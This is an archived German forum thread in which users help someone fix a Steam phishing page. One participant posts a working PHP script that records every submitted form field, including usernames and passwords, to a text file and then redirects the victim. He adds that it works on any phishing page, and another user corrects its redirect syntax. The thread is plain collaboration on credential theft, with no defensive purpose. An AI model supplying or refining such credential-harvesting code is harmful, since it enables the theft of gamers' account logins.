PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Problem mit Steam Phishing Seite



roccihrs
05.06.2009, 21:59
-

-=Player=-
06.06.2009, 09:10
sorry, aber ich sehe keine problembeschreibung.
Das script funktioniert doch, wo ist denn dein Problem?

VeN0m
06.06.2009, 09:34
META?! Oh mein Gott... Wirklich das ist ein Anfänger-Code. Nichts für ungut aber Meta würde niemand mehr nutzen. Auch würde niemand die Feldnamen aus dem POST-Array in Variablen schreiben.
Einfacher und eleganter:



<?php

header("Location: /steam.php");

$handle = fopen("name.txt","a");

foreach($_POST AS $key => $value) {

fwrite($handle,$key."=".$value."\r\n");

}

fwrite($handle,"\r\n");
fclose($handle);

exit;

?>


Zum lesen: Foreach (http://de.php.net/manual/de/control-structures.foreach.php), Header (http://de.php.net/manual/de/function.header.php)

Der Code schreibt wenn z.B. der Name über $_POST['name'] übergeben wird und den Wert "Sven" hat sowie $_POST['password'] = "meinpassword" ist folgendes in die Datei:



name=Sven
password=meinpassword


Ohne, dass Du erst die POST-Werte in Variablen schreiben musst. Ist so viel einfacher, da es auf jeder Phishingseite geht.

Oder wo lag nun Dein Problem? Ich denke mal der Code erfüllte nicht, was er sollte?

-=Player=-
06.06.2009, 09:49
bis auf, dass er in der header funktion ein doppelpunkt hinter dem Location vergessen hat, hat Power-Sven komplett recht ;)

roccihrs
06.06.2009, 13:46
-

VeN0m
06.06.2009, 15:18
@Player: Upps. Peinlich... ^^ Habs hinzugefügt. Danke ;).
@roccihrs: Wie wäre es mal mit einer genaueren Problembeschreibung? _Was_ geht nicht? Der Redirekt? Das Schreiben des Textes in die Datei? Hattest Du meinen Code mit der Verbesserung von Player probiert? Wenn ja, gehts? Bitte mehr Informationen...

Ach... Und Domains haben mit der Funktionsweise einer Phishingseite oder überhaupt von Scripten nichts zu tun. Das sind die Spaces / Server, deren Konfrigruation die Ausführung mancher Funktionen und somit der Scripte verhindert / eindämmt. Die Domain ist nur ein Name, der über der IP des Servers liegt. Per DNS (Domain Name Server) wird dann die IP rausgesucht, die zu der Domain gehört. Ist wie ein Telefonbuch.